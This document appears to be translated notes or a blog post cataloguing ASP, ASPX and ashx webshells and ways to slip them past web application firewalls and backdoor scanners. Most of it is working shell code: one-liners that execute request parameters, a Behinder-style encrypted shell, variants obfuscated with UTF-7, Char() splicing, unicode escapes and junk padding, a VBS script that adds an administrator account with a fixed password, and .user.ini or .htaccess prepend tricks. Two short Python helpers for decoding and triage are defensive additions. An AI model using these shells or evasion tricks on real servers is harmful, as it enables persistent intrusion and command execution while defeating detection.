php_value auto_append_file .htaccess # includes itself.
#<?php phpinfo();
php.ini
Modify auto_prepend_file = shell.txt or auto_append_file = shell.txt
Modify include_path so it can be reached from any page: include_path = ".;D:\phpstudy\www\"
Write webshell.txt into the path D:\phpstudy\www\
.user.ini + uploaded jpg
auto_prepend_file = a.jpg
auto_append_file = a.jpg
ASP shells
Setting up an ASP environment
Online method (fast)
http://landian.cc/
Building an ASP site with 宝塔 (BT panel)
https://www.vpsss.net/26656.html
https://blog.csdn.net/weixin_46709219/article/details/111940519
Adding an SSL certificate
https://www.yuntue.com/post/27543.html
1. Basic knowledge points
ASP one-liner shell basics
ASP execution functions:
Eval, Execute, ExecuteGlobal
ASP comment markers:
' and REM; if you use VBScript, the comments <!-- --> and // also work
ASP interpreter:
VBScript
The difference between eval and execute
eval computes the value of an expression and returns the result
response.Write(eval("3+2")) ' outputs 5
Execute runs one or more statements. Multiple statements are separated by colons (:)
Execute "response.Write(""abc"")" ' outputs abc
ASP basics
① Values
//dim declares a variable; it can hold functions, booleans, numbers, integers
Dim str: str="xxx"
dim str as sssss
Dim name,age
name="111"
age="18"
//set also assigns, but is used for special (object) data types
set conn=server.createobject("adodb.connection")
// Define an array
dim a(5)
// Read a GET value
request.querystring("name")
request()
request.item("c")
// Read a POST value
request.form("lname")
// Read a cookie
Request.Cookies("firstname")
DIM is generally used to declare variables, e.g. dim variablename as datatype
SET is generally used to assign values of special (object) data types
② How to define a function
Function b():
response.write("xxxx")
End Function
b()
③ Classes
Class myclass
Private Sub Class_Initialize // method run when the class is created
response.write("xxxx")
End Sub
private sub class_terminate() // method run when the class ends
response.write " Class is over <br>"
End sub
End Class
④ Loops
<%
dim i
i=0
dim sum
sum=0
for i=1 to 10
sum=sum+i
response.write(sum&chr(10) )
next
%>
⑤ Creating component instances
Server.CreateObject("Scripting.FileSystemObject") // file system component
Server.CreateObject("Scripting.Dictionary") // key/value dictionary object
CreateObject("WScript.Shell") // wscript component; used to operate on the registry, execute commands, etc.
Putting the following code into 1.vbs and running it pops up the calculator; on the web side the calculator also appears in Task Manager, but it is not shown directly
dim oShell,cmd
Set oShell = CreateObject("WSCript.shell")
cmd="calc.exe"
call oShell.exec(cmd)
⑥ Common string-handling functions
Function  Description
InStr Returns the position of the first occurrence of one string inside another, searching from the first character.
InStrRev Returns the position of the first occurrence of one string inside another, searching from the last character.
LCase Converts the specified string to lowercase .
Left Returns the specified number of characters from the left side of the string .
Len Returns the number of characters in a string .
LTrim Remove the space to the left of the string .
RTrim Remove the space to the right of the string .
Trim Remove the spaces to the left and right of the string .
Mid Returns a specified number of characters from a string .
Replace Replace the specified part of the string with another string for the specified number of times .
Right Returns a specified number of characters starting from the right side of a string .
Space Returns a string consisting of a specified number of spaces .
StrComp Compare two strings , Returns a value representing the result of the comparison .
String Returns a string containing repeated characters of a specified length .
StrReverse Reverse string .
UCase Converts the specified string to uppercase .
Common techniques
Array evasion
<%
dim a(5)
a(0)=request("404")
eXecUTe(a(0))
%>
// add a loop
<%
dim array(1)
dim c
array(1)=request("404")
for each a in array
c = a & ""
next
execute(c)
%>
Function approach
<%
Function b():
b = request("404")
End Function
Function f():
eXecUTe(b())
End Function
f()
%>
Encryption approach
<%
eXecUTe(gw_jiemi("920022008400D4002200820047003700560057001700560027000200C60016006700560077007600"))
function gw_jiemi(text)
const key="gw"
dim str : str=text
dim str1
dim str2 : str2=strreverse(str)
for i=1 to len(str2) step 4
str1=str1 & ChrW(cint("&H" & mid(str2,i,4)))
next
gw_jiemi=mid(str1,len(key)+1,len(str)-len(key))
end function
%>
Comments
<%
<!--
a = request("404")
execute(a)
-->
%>
Class approach
<%
Class LandGrey
private str_title
public property let setauthor(str)
execute(str&"")
end property
End Class
Set a= New LandGrey
a.setauthor= request("404")
%>
String manipulation
<%
a = request("404")
b = Left(a,99999)
execute(b)
%>
// case toggling
<%
a = request("404")
b = Left(UCase(a),99999)
execute(b)
%>
// Splice spaces: this one is already detected
<%
a = request("404")
b = Left(UCase(a)&"",99999)
execute(b)
%>
Typical ASP features
① Supported language tags: <%@ language="Javascript" %> and <%@ language="vbs" %> // case-sensitive
<%@ language="Javascript" %>
<%
Response.Write("Hello World!")
/*asdasasdasda d*/
%>
② The header can be changed to the following
ASP code blocks are usually wrapped in <% %> tags and interpreted as VBScript by default. The quotes can be removed.
<script language="VBScript" runat="server">
xxxx
</script>
<script language=vbs runat=server>
xxx
</script>
<%@ language=vbs %>
<%@ language="VBscript" %>
<%@ LANGUAGE = VBScript.Encode %>
③ Comments
' single quote (single-line comment)
REM rem + space (single-line comment)
// double slash (single-line comment; VBScript and JScript; IIS only)
<!-- --> HTML comment (single-line comment; VBScript; IIS only)
/* */ multi-line comment (JScript)
③ Line-break feature
Use _ to continue a line
For example response.write("iceice") // with the line-continuation feature, _ lets the statement continue on the next line
Response._
Write("iceice")
Response._
_
_
Write("iceice")
④ Splicing feature
Principle: strings in double quotes can be concatenated, and ASP also supports replacing any character with chr()
Response.Write("Test"++++++"asdasdas"&"cccccccccccccccc"&""&chr(97))
// Final output: Testasdasdascccccccccccccccc
⑤ eval command execution in ASP
Principle: call wscript.shell to execute the command, similar to system in PHP; this one can bypass
// Reference: the difference between run and exec in wscript.shell
//https://www.cnblogs.com/swek/articles/4337999.html
<%
set stm=server.CreateObject("adodb.stream")
set oScript =CreateObject("WSCRIPT.SHELL")
dim file
file="C:\\ProgramData\\1.txt"
dim command
command=request("command")
call oScript.run("cmd.exe /c " & command&" > " & file, 0, True)
' execute the command
stm.Type=2
stm.mode=3
stm.charset="gbk"
'stm.charset="utf-8"
stm.open
stm.loadfromfile(file)
str=stm.readtext
stm.Close
Response.Write(str)
%>
⑥ Odd colons
// Most other characters break parsing; ASP's fault tolerance is low
: stands for a new statement.
It marks the end of the previous statement.
Principle: in ASP, adding ::::: does not affect parsing, and neither does :::ssssasdas::::
except with eval functions
//bypass
<%
:::::execute(request("cmd"))::::::::::xasdasdas::::::::::asdasdas::::::::x:
:::::adasdasd::
:::::adasdasd::response.write("asdsad"):::::adasdasd::
::::sss:adasdasd::now():::::adasdasd::
%>
⑦ ASP encoding characteristics
https://blog.csdn.net/weixin_40133121/article/details/108595440
codepage=936 Simplified Chinese (GBK)
codepage=950 Traditional Chinese (Big5)
codepage=437 US / Canadian English
codepage=932 Japanese
codepage=949 Korean
codepage=866 Russian
codepage=65001 Unicode (UTF-8)
// ASP syntax supports UTF-7 encoding; 65000 is the codepage for UTF-7
<%@codepage=65000%>
<%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("cmd")%>
// In UTF-7, a +xx- sequence whose xx is at most 2 characters decodes to nothing, so this idea can be used to bypass
<%@codepage=65000%>
<%e+ss-v+k-a+k-l r+k-e+ka-q+k-u+k-e+kd-s+ks-t("cmd")+xx-+xx-+xx-+x-%>
// So it can be turned into
<%@@@@@@@@@@codepage=65000%>
<%
+AGUAdgBhAGw-(r+k-e+k-q+k-u+k-e+k-s+k-t("cmd"))
%>
// UTF-7 codec tool
https://lark-assets-prod-aliyun.oss-cn-hangzhou.aliyuncs.com/yuque/0/2022/rar/1431765/1647787698646-132dfb49-3550-405f-ac19-a4e8896e2ae0.rar?OSSAccessKeyId=LTAI4GGhPJmQ4HWCmhDAn4F5&Expires=1652629805&Signature=8ZlAVqjVm4DtYkyMP5iW%2Fh3%2FOMY%3D&response-content-disposition=attachment%3Bfilename*%3DUTF-8%27%27_UTF-7%2520%25E7%25BC%2596%25E7%25A0%2581%25E8%25A7%25A3%25E7%25A0%2581%25E5%25B7%25A5%25E5%2585%25B7.rar
SCRENC tool
// screnc is Microsoft's own script encoder, but when I found the tool I could not get it to work no matter what.
//http://bcn.bathome.net/s/tool/index.html?key=screnc
MsgBox 123
becomes
#@~^CgAAAA==\ko$K6,F 2BgMAAA==^#~@
// A webshell of this kind needs a header prefix
<script language="VBScript.Encode">
#@~^[email protected]#@&j1D
bwYc214W,J3x1W[roPbdP1WW^[email protected]#@&PQsAAA==^#~@</script>
// When ASP finds VBScript.Encode declared in the file header and then finds #@~^ ..... ^#~@ in the content that follows,
// it automatically decrypts and interprets the ciphertext inside #@~^(...)^#~@
// String processing tools
// Obfuscation tool: https://github.com/sevagas/macro_pack
⑧ The difference between wscript and cscript
Both run VBS scripts directly on the client; the difference is that one shows a dialog box while the other prints to the console:
the former pops up a window, the latter does not.
Common VBS scripts
// Adds a user
Set wsnetwork=CreateObject("WS"&"CR"&"IPT"&"."&"NET"&"WO"&"RK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","iiice")
Const strPassword = "123456"
od.SetPassword strPassword
od.SetInfo
Set of=GetObject(os&"/iiice",user)
oe.add os&"/iiice"
// 3389: reads the Terminal Services (RDP) port from the registry
Dim ReadComputerName
Set ReadComputerName=WScript.CreateObject("WScript.Shell")
Dim TSName,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSName=ReadComputerName.RegRead(TSRegPath)
WScript.Echo("TermService port is:"&TSName)
Typical ASPX characteristics
① Unicode feature
Unlike JSP, it only supports unicode-encoding the 26 letters; other characters cannot be encoded this way.
ASPX also supports \u escapes.
For example, a tool will turn xyz into
\u0078\u0079\u007a
but it also accepts
\u0078y\u007a
\u0078\u0079z
\u0078\u0079\u007A
\U00000078\u0079z
\U00000078\u200c\u200d\u200d\U0000200d\u0079z
② Comment feature
e.g. /*1212121*/
③ <%%> truncation feature
Multiple <% %> blocks can be spliced together to form a statement
④ Empty-character joining
\u200c \u200d \u200e \u200f
⑤ @ symbol
Extra @ symbols do not affect parsing
⑥ Header feature
That is, the header declaration can be changed.
For example, the headers
<%@ Page Language="Jscript"%>
<%@Page Language=JS%>
<%@ Page Language="C#" %>
can be replaced with
<%@Language=CSHARP%>
⑦ Character-encoding transformation feature
Change the file encoding in VS Code; if the WAF does not support UTF-16, there is also a chance of bypassing it.
//⑧ Curly-brace and semicolon feature in the asp.net environment
// Principle: large numbers of {} and ; can be appended around the original syntax without affecting parsing
<% @page language=c#%>;;;;;;;;;;;;;;;;;;;;
<%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b");{
{
{
}}} byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);{
{
{
;}}} Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);;;;;;;;;;;;;;;;;;;;;%>
//⑨ Code block format
<% @language="C#" %>
<%Response.Write("hello world ashx");%>
// Can also be written as
<script language=csharp runat=server>
void page_load(){
Response.Write("hello world");}
</script>
// This uses void page_load() to get around detection
<script language=csharp runat=server>
void page_load(){
Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth);
System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);
}
</script>
//⑩ Line break feature
ASPX also supports line breaks inside a statement
//⑪ C# /// feature and XML comment symbol feature
For example, the following
<%
@
language
=
c#
%>
<%
@Import
Namespace="System.Reflection"%>
<%Session.Add("k",
//@#@!#[email protected]#[email protected]#[email protected]#[email protected]#[email protected]#[email protected]#
"e45e329feb5d925b"); byte[]
//@#@!#[email protected]#[email protected]#[email protected]#[email protected]#[email protected]#[email protected]#
k = Encoding.Default.GetBytes(Session[0] + ""),
//@#@!#[email protected]#[email protected]#[email protected]#[email protected]#[email protected]#[email protected]#
c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth);
//@#@!#[email protected]#[email protected]#[email protected]#[email protected]#[email protected]#[email protected]#
Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
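A triage helper, added here as an example and not code from the original post, that reverses the UTF-7 codepage trick, the C#/JScript \u escapes and the zero-width/bidi characters shown above before matching sink names; the sink list, the regexes and both sample files are constructed for this example.

```python
"""Triage helper for uploaded ASP/ASPX files: undo the presentation tricks
catalogued above, then look for the usual webshell sinks (added example)."""
import re
import unicodedata

# Sink names worth flagging once the source is normalized (constructed list).
SINK_RE = re.compile(
    r"\b(eval|execute|executeglobal|executestatement)\b|assembly\.load"
    r"|request\.binaryread|wscript\.shell|scriptcontrol",
    re.IGNORECASE,
)
CODEPAGE_RE = re.compile(r"<%\s*@+\s*codepage\s*=\s*(\d+)\s*%>", re.IGNORECASE)
ESCAPE_RE = re.compile(r"\\u([0-9a-fA-F]{4})|\\U([0-9a-fA-F]{8})")


def decode_source(raw: bytes) -> str:
    """Honor the @codepage directive: 65000 means UTF-7, where a short shift
    sequence such as '+xx-' carries no character.  Python's decoder rejects such
    partial sequences, so errors='ignore' drops them as the ASP parser does."""
    m = CODEPAGE_RE.search(raw[:512].decode("latin-1"))
    if m and m.group(1) == "65000":
        return raw.decode("utf-7", errors="ignore")
    return raw.decode("utf-8", errors="replace")


def normalize(src: str) -> str:
    """Strip the tricks that keep a sink name from matching a naive signature."""
    # \uXXXX / \UXXXXXXXX escapes, which C# and JScript accept inside identifiers
    src = ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), src)
    # zero-width and bidi format characters (\u200c, \u200d, \u202c ...)
    src = "".join(ch for ch in src if unicodedata.category(ch) != "Cf")
    # block comments spliced between letters, e.g. e/*x*/v/*x*/a/*x*/l
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.DOTALL)
    # VBScript line continuation: a trailing "_" joins the next line
    src = re.sub(r"_[ \t]*\r?\n[ \t]*", "", src)
    # runs of ASP statement separators (":::::") collapse to a single one
    return re.sub(r":{2,}", ":", src)


def find_sinks(src: str) -> list:
    """Distinct sink names present in src, lower-cased and sorted."""
    return sorted({m.group(0).lower() for m in SINK_RE.finditer(src)})


def triage(raw: bytes) -> dict:
    """Compare what a byte-level signature sees with what the parser will run."""
    return {
        "naive": find_sinks(raw.decode("latin-1")),
        "normalized": find_sinks(normalize(decode_source(raw))),
    }


# Constructed samples modelled on the UTF-7 and unicode-escape tricks above.
SAMPLE_UTF7 = (
    b"<%@@@@@@@@@@codepage=65000%>\r\n"
    b'<%\r\n+AGUAdgBhAGw-(r+k-e+k-q+k-u+k-e+k-s+k-t("cmd"))+xx-+x-\r\n%>'
)
SAMPLE_ASPX = (
    b"<script language=csharp runat=server>\r\nvoid page_load(){\r\n"
    b"byte[] c = Request.Binary\\u200cRead(Request.C\\u202con\\u202dtent\\u202bLen\\u202egth);\r\n"
    b'System.Reflection.Assem\\u200cbly.Lo\\U00000061d(c).CreateInstance("U");\r\n'
    b"}\r\n</script>"
)
```

Neither sample matches a sink before normalization, which is the point of the tricks; after normalization both do.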

The difference and connection between asp and aspx
1.) ASPX cannot run ASP-specific syntax, and ASP cannot run ASPX-specific syntax
<%
dim aaa
aaa="sdasdasda"
//for i=1 to 10
//response.write(time())
response.write(aaa)
Response.Write(DateTime.Now.Date.ToShortDateString())
%>
// As above: dim is supported when running under aspx, but nothing else is, for example the for loop
2.) The semicolon problem
ASP syntax does not support semicolons by default, not even a single one; only a prefix such as @language=jscript makes semicolons valid.
3.) An aspx suffix with no prefix declaration supports REM comments
In this case, an .aspx file supports rem xxx and single-quote comments, but not // , /**/ , <!-- -->
As shown below
<%
dim aaa
aaa="sdasdasda"
response.write(aaa)
Response.Write("Test")
rem asdasdasdasdsaasdasdasdas
' asdasdasd
%>
I don't know what this feature is good for: the aspx suffix supports ASP comments but not ASP syntax; to use ASPX syntax you must add C#, and once C# is added, ASP comments are no longer supported.
4.) ASPX does not need to be closed
ASP reports an error if it is not closed, whereas with the aspx suffix
<%execute request("cmd")%>
2. Typical shells
One-line Trojans
ASP:
<% execute(request("value")) %>
<%eval request ("value")%>
ASPX:
<%@ Page Language="Jscript" %>
<% eval(Request.Item["value"]) %>
Behinder (Ice Scorpion) ASP shell, the standard one
<%
Response.CharSet = "UTF-8"
k="e45e329feb5d925b" ' The key is the first 16 characters of the 32-character MD5 of the connection password; the default password is rebeyond
Session("k")=k
size=Request.TotalBytes
content=Request.BinaryRead(size)
For i=1 To size
result=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))
Next
execute(result)
%>
Relay shell
<%@ page Language="Jscript" %>
<%
System.IO.File.WriteAllText(System.Web.HttpContext.Current.Server.MapPath("")+"\\1.txt",System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String("YXNkYXNkc2Q=")));
%>
Earlier bypass samples
//① Function-based bypass idea --> ASP shell that gets past the first layer of backdoor detection
<%
Function b():
b = request("99999")
End Function
Function f():
eXecUTe(b())
End Function
f()
%>
//② Class-based bypass ASP shell
<%
Class zzz
private yyy
Private Sub Class_Initialize
yyy = ""
End Sub
public property let www(yyy)
execute(yyy)
end property
End Class
Set xxx= New zzz
dim vvv(7)
vvv(2)=request("99999")
xxx.www= vvv(2)
%>
//③ Encoding-based ASP shell; backdoor parameter 1fg7wcusijnbhk
<%
Function fwomckmokef(fownmcjon)
fownmcjon = Split(fownmcjon,"()")
For z=1 To Ubound(fownmcjon)
fwomckmokef=fwomckmokef&Chr(fownmcjon(z)-98765)
Next
End Function
ExecuteGlobal fwomckmokef("()98866()"&"98883()98862()98873()"&"98797()98879()98866()98878()98882()98866()98880()98881()98805()"&"98799()98814()98867()98868()98820()98884()98864()98882()98880()98870()98871()"&""&"98875()98863()"&"98869()98872()98799()98806")
%>
//④ ASPX shell; principle: with Char() the encoded form is not flagged
<%@ Page Language="Jscript"%>
<%
var a = Request.Item["M"];
var b = "un" + Char ( 115 ) + Char ( 97 ) + "fe";// This spot is what matters; the other places don't seem to
eval(a,b);
Response.Write("Test");
%>
//⑤ ASP
<%
P=request("pass")
A=mid(P,1,1)
B=mid(P,2,9999)
eval A&B
%>
// ASPX
<%@ Page Language="Jscript"%>
<%
var p = Request.Item["M"];
var a = p.substring(0,1);
var b = p.substring(1,99999);
var c = "un" + Char ( 115 ) + Char ( 97 ) + "fe";
eval(a+b,c);
%>
// ASPX, principle: Char()
<%@ Page Language="Jscript"%>
<%
var a = "un" + Char ( 115 ) + Char ( 97 ) + "fe";
var b = Char ( 82 ) + Char ( 101 ) + Char ( 113 ) + Char ( 117 ) + Char ( 101 ) + Char ( 115 ) + Char ( 116 ) + Char ( 46 ) + Char ( 73 ) + Char ( 116 ) + Char ( 101 ) + Char ( 109 ) + Char ( 91 ) + Char ( 34 ) + Char ( 77 ) + Char ( 34 ) + Char ( 93 );
var M = eval(b,a);
var T = eval(M,a);
Response.Write("Test");
%>
// ASP
<%
Function GetBaidu()
E = ("Request." & Chr ( 70 ) & "orm")
M = Chr ( 34 ) & ("M") & Chr ( 34 )
T = "eva" & Chr ( 108 ) & UnEscape("%20" & E & "%28" & M & "%29")
'%><%//%><%eXeCutegLobaL (T)
End Function
GetBaidu()
%>
// ASP, idea: pad with junk data to bypass
<%
a="11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"
eval " "&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")
%>
// Encoding-based bypass idea
<%
Function test():
dim aaa
aaa="%65%76%61%6c%28%72%65%71%75%65%73%74%28%22%6d%72%36%22%29%29"
test = unescape(aaa)
End Function
eval(test())
%>
// Nested variant
<%
Function b():
dim aaa
aaa="%65%76%61%6c%28%72%65%71%75%65%73%74%28%22%6d%72%36%22%29%29"
b = unescape(aaa)
End Function
Function f():
eval(b())
End Function
f()
%>
//
<%@ language = VBscript %>
<%<!--%^_^%-->
SET LandGrey = server.CreateObject("mS"&chr(115)&"cR"&chr(105)&"pTCo"&Chr(110)&Chr(84)&"rOL.Sc"&chr(114)&"IpTCo"&Chr(110)&Chr(84)&"rOL.1")
LandGrey.lANguaGE = cHr(86)&"BsC"&CHR(114)&chr(105)&"PT"
LandGrey.AddObject "REsponse", Response
LandGrey.AddObject "r"&chr(101)&"quEst", requesT
LandGrey.AddObject "s"&chr(101)&"ssIon", sessiOn
LandGrey.AddObject "serv"&chr(101)&"r", serVer
LandGrey.AddObject "apPlic"&CHR(97)&"tIon", application
x=("eV"&CHr(&0141)&"L"&Chr(40)&"rEqU"&cHr(101)&"St("&chr(34)&"fool"&chr(34)&CHR(41)&")")
LandGrey.eXECuTeStAtEmENt("eV"&CHr(&0141)&"L"&Chr(40)&"rEqU"&cHr(101)&"St("&chr(34)&"fool"&chr(34)&CHR(41)&")")
%>
3. Small tips
1.) How to recover the backdoor password: use response.write
<%
Function fwomckmokef(fownmcjon)
fownmcjon = Split(fownmcjon,"()")
For z=1 To Ubound(fownmcjon)
fwomckmokef=fwomckmokef&Chr(fownmcjon(z)-98765)
Next
End Function
response.write fwomckmokef("()98866()"&"98883()98862()98873()"&"98797()98879()98866()98878()98882()98866()98880()98881()98805()"&"98799()98814()98867()98868()98820()98884()98864()98882()98880()98870()98871()"&""&"98875()98863()"&"98869()98872()98799()98806")
%>
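The same recovery as the response.write tip above, done offline in Python so the shell never has to be executed. This is an added example, not code from the original post; the regexes are assumptions about that one encoding scheme (Split on a delimiter, then Chr(n - offset)), and the sample input is the page's own encoded shell embedded as a string.

```python
"""Recover the plaintext of the offset-Chr encoded ASP shell above without
running it (added example; parses only that one encoding scheme)."""
import re

# Chr(parts(z)-OFFSET) inside the decoder function
OFFSET_RE = re.compile(r"Chr\(\s*\w+\(\w+\)\s*-\s*(\d+)\s*\)", re.IGNORECASE)
# Split(text,"DELIM")
DELIM_RE = re.compile(r'Split\(\s*\w+\s*,\s*"([^"]+)"\s*\)', re.IGNORECASE)


def decode_offset_chr(src: str) -> str:
    """Parse the decoder function for its delimiter and offset, then apply
    them to the string literal passed at the call site."""
    fname = re.search(r"Function\s+(\w+)\s*\(", src, re.IGNORECASE).group(1)
    offset = int(OFFSET_RE.search(src).group(1))
    delim = DELIM_RE.search(src).group(1)
    # the call site is fname( followed by one or more "..." literals joined by &
    call = re.search(re.escape(fname) + r'\(((?:\s*"[^"]*"\s*&?)+)\)', src)
    literal = "".join(re.findall(r'"([^"]*)"', call.group(1)))
    # VBScript loops from index 1, so the empty element before the first delimiter is skipped
    return "".join(chr(int(p) - offset) for p in literal.split(delim)[1:] if p)


# The encoded shell from the page, embedded here as the sample input.
SAMPLE_SHELL = (
    '<%\r\nFunction fwomckmokef(fownmcjon)\r\n'
    'fownmcjon = Split(fownmcjon,"()")\r\n'
    'For z=1 To Ubound(fownmcjon)\r\n'
    'fwomckmokef=fwomckmokef&Chr(fownmcjon(z)-98765)\r\n'
    'Next\r\nEnd Function\r\n'
    'ExecuteGlobal fwomckmokef("()98866()"&"98883()98862()98873()"'
    '&"98797()98879()98866()98878()98882()98866()98880()98881()98805()"'
    '&"98799()98814()98867()98868()98820()98884()98864()98882()98880()98870()98871()"'
    '&""&"98875()98863()"&"98869()98872()98799()98806")\r\n%>'
)
```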
Shells in special formats
ashx shells
ashx shell 1
<%@ WebHandler Language="C#" class="DynamicCodeCompiler"%>
using System;
using System.Web;
using System.CodeDom.Compiler;
using System.Reflection;
using System.Text;
public partial class DynamicCodeCompiler : IHttpHandler
{
public bool IsReusable
{
get {
return false; }
}
public static string SourceText(string txt)
{
StringBuilder sb = new StringBuilder();
sb.Append("using System;");
sb.Append(Environment.NewLine);
sb.Append("namespace Neteye");
sb.Append(Environment.NewLine);
sb.Append("{");
sb.Append(Environment.NewLine);
sb.Append(" public class NeteyeInput");
sb.Append(Environment.NewLine);
sb.Append(" {");
sb.Append(Environment.NewLine);
sb.Append(" public void OutPut()");
sb.Append(Environment.NewLine);
sb.Append(" {");
sb.Append(Environment.NewLine);
sb.Append(Encoding.GetEncoding("UTF-8").GetString(Convert.FromBase64String(txt)));
sb.Append(Environment.NewLine);
sb.Append(" }");
sb.Append(Environment.NewLine);
sb.Append(" }");
sb.Append(Environment.NewLine);
sb.Append("}");
string code = sb.ToString();
return code;
}
public static void DynamicCodeExecute(string txt)
{
CodeDomProvider compiler = CodeDomProvider.CreateProvider("C#"); // compiler
CompilerParameters comPara = new CompilerParameters(); // Compiler parameters
comPara.ReferencedAssemblies.Add("System.dll");
comPara.GenerateExecutable = false;
comPara.GenerateInMemory = true;
CompilerResults compilerResults = compiler.CompileAssemblyFromSource(comPara, SourceText(txt));
Assembly objAssembly = compilerResults.CompiledAssembly;
object objInstance = objAssembly.CreateInstance("Neteye.NeteyeInput");
MethodInfo objMifo = objInstance.GetType().GetMethod("OutPut");
var result = objMifo.Invoke(objInstance, null);
}
public void ProcessRequest(HttpContext context)
{
context.Response.ContentType = "text/plain";
if (!string.IsNullOrEmpty(context.Request["txt"]))
{
//start calc: System.Diagnostics.Process.Start("cmd.exe","/c calc"); => U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MuU3RhcnQoImNtZC5leGUiLCIvYyBjYWxjIik7
//show ipconfig: System.Diagnostics.Process.Start("cmd.exe","/c ipconfig"); => U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MuU3RhcnQoImNtZC5leGUiLCIvYyBpcGNvbmZpZyIpOw==
DynamicCodeExecute(context.Request["txt"]);
context.Response.Write("Execute Status: Success!");
}
else
{
context.Response.Write("Just For Fun, Please Input txt!");
}
}
}
ashx shell 2
<%@ WebHandler Language="C#" class="JscriptDynamicCodeCompiler"%>
using System;
using System.Web;
using System.CodeDom.Compiler;
using System.Reflection;
/// <summary>
/// code by Ivan1ee, just for fun!
/// </summary>
public static class DynamicCodeCompiler
{
private static Type _runType; private static object _runInstance;
private static readonly string _jscriptClassText =
@"import System;
class JScriptRun
{
public static function RunExp(expression : String) : String
{
return e/*@[email protected]*/v/*@[email protected]*/a/*@[email protected]*/l(expression);
}
}";
private static void Initialize()
{
CodeDomProvider compiler = CodeDomProvider.CreateProvider("Jscript");
CompilerParameters parameters = new CompilerParameters();
parameters.GenerateInMemory = true;
parameters.ReferencedAssemblies.Add("System.dll");
CompilerResults results = compiler.CompileAssemblyFromSource(parameters, _jscriptClassText.Replace("/*@[email protected]*/", ""));
Assembly assembly = results.CompiledAssembly;
_runType = assembly.GetType("JScriptRun");
_runInstance = Activator.CreateInstance(_runType);
}
public static string Run(string expression)
{
if (_runInstance == null)
Initialize();
object result = _runType.InvokeMember("RunExp", BindingFlags.InvokeMethod, null, _runInstance, new object[] {
expression });
return (result == null) ? null : result.ToString();
}
}
/// <summary>
/// Summary description for Handler1
/// </summary>
public class JscriptDynamicCodeCompiler : IHttpHandler
{
public void ProcessRequest(HttpContext context)
{
context.Response.ContentType = "text/plain";
if (!string.IsNullOrEmpty(context.Request["txt"]))
{
//start calc: System.Diagnostics.Process.Start("cmd.exe","/c calc"); => U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MuU3RhcnQoImNtZC5leGUiLCIvYyBjYWxjIik7
//show ipconfig: System.Diagnostics.Process.Start("cmd.exe","/c ipconfig"); => U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MuU3RhcnQoImNtZC5leGUiLCIvYyBpcGNvbmZpZyIpOw==
DynamicCodeCompiler.Run(System.Text.Encoding.GetEncoding("UTF-8").GetString(Convert.FromBase64String(context.Request["txt"])));
context.Response.Write("Execute Status: Success!");
}
else
{
context.Response.Write("Just For Fun, Please Input txt!");
}
}
public bool IsReusable
{
get
{
return false;
}
}
}
Java memory shell
Java - SpringBoot persistent WebShell (adaptable to any JavaEE-compliant service)
https://github.com/threedr3am/ZhouYu